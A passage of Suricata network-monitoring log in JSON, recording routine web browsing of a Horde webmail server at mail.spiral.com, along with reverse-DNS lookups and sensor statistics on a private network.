{"timestamp":"2020-02-29T00:03:02.000199+0000","event_type":"stats","stats":{"uptime":13834,"capture":{"kernel_packets":132778,"kernel_drops":0},"decoder":{"pkts":132791,"bytes":92097298,"invalid":180,"ipv4":131362,"ipv6":8,"ethernet":132791,"raw":0,"null":0,"sll":0,"tcp":126346,"udp":4822,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2679,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2695,"synack":2686,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1724,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2198,"failed_udp":107},"tx":{"http":4471,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2275}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21491,"memcap_state":0,"memcap_global":0},"http":{"memuse":47053,"memcap":0}}} {"timestamp":"2020-02-29T00:03:02.001199+0000","flow_id":2014930921353933,"event_type":"flow","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":2240,"bytes_toclient":17008,"start":"2020-02-29T00:01:20.225997+0000","end":"2020-02-29T00:02:01.561213+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:02.101930+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23108,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:02.356770+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659}} {"timestamp":"2020-02-29T00:03:03.000701+0000","flow_id":1508640163537177,"event_type":"flow","src_ip":"192.168.10.122","src_port":55863,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:02.368921+0000","end":"2020-02-28T23:58:02.481155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:05.506519+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19220,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:05.785158+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618}} {"timestamp":"2020-02-29T00:03:07.231023+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18958,"tx_id":0}} {"timestamp":"2020-02-29T00:03:07.238381+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":686,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:07.485303+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173}} {"timestamp":"2020-02-29T00:03:08.000478+0000","flow_id":2113444573572588,"event_type":"flow","src_ip":"192.168.10.122","src_port":36684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.290284+0000","end":"2020-02-28T23:58:07.401752+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.000652+0000","flow_id":1007666603637629,"event_type":"flow","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":3083,"bytes_toclient":19825,"start":"2020-02-29T00:01:58.211837+0000","end":"2020-02-29T00:02:07.266149+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:08.000779+0000","flow_id":1732648478160707,"event_type":"flow","src_ip":"192.168.10.122","src_port":39450,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.505667+0000","end":"2020-02-28T23:58:07.617342+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.941077+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} {"timestamp":"2020-02-29T00:03:08.950105+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63050,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:09.000201+0000","event_type":"stats","stats":{"uptime":13841,"capture":{"kernel_packets":132831,"kernel_drops":0},"decoder":{"pkts":132841,"bytes":92119962,"invalid":180,"ipv4":131410,"ipv6":8,"ethernet":132841,"raw":0,"null":0,"sll":0,"tcp":126388,"udp":4828,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2681,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2697,"synack":2688,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1726,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2201,"failed_udp":107},"tx":{"http":4474,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2278}},"flow_mgr":{"closed_pruned":2653,"new_pruned":15,"est_pruned":2243,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21751,"memcap_state":0,"memcap_global":0},"http":{"memuse":168043,"memcap":0}}} {"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:09.122920+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171}} {"timestamp":"2020-02-29T00:03:09.151356+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33109,"tx_id":1}} {"timestamp":"2020-02-29T00:03:09.190153+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} {"timestamp":"2020-02-29T00:03:09.191876+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:03:09.192187+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} {"timestamp":"2020-02-29T00:03:09.205894+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} {"timestamp":"2020-02-29T00:03:09.206216+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} {"timestamp":"2020-02-29T00:03:09.242286+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} {"timestamp":"2020-02-29T00:03:09.247875+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:03:09.249821+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:03:09.250673+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} {"timestamp":"2020-02-29T00:03:09.250924+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:03:09.252524+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":0}} {"timestamp":"2020-02-29T00:03:09.252937+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:03:09.253102+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:03:09.253546+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":1}} {"timestamp":"2020-02-29T00:03:09.254808+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:03:09.256273+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":7}} {"timestamp":"2020-02-29T00:03:09.257064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:03:09.258222+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":8}} {"timestamp":"2020-02-29T00:03:09.265133+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:03:09.267064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":9}} {"timestamp":"2020-02-29T00:03:09.268635+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:03:09.270134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 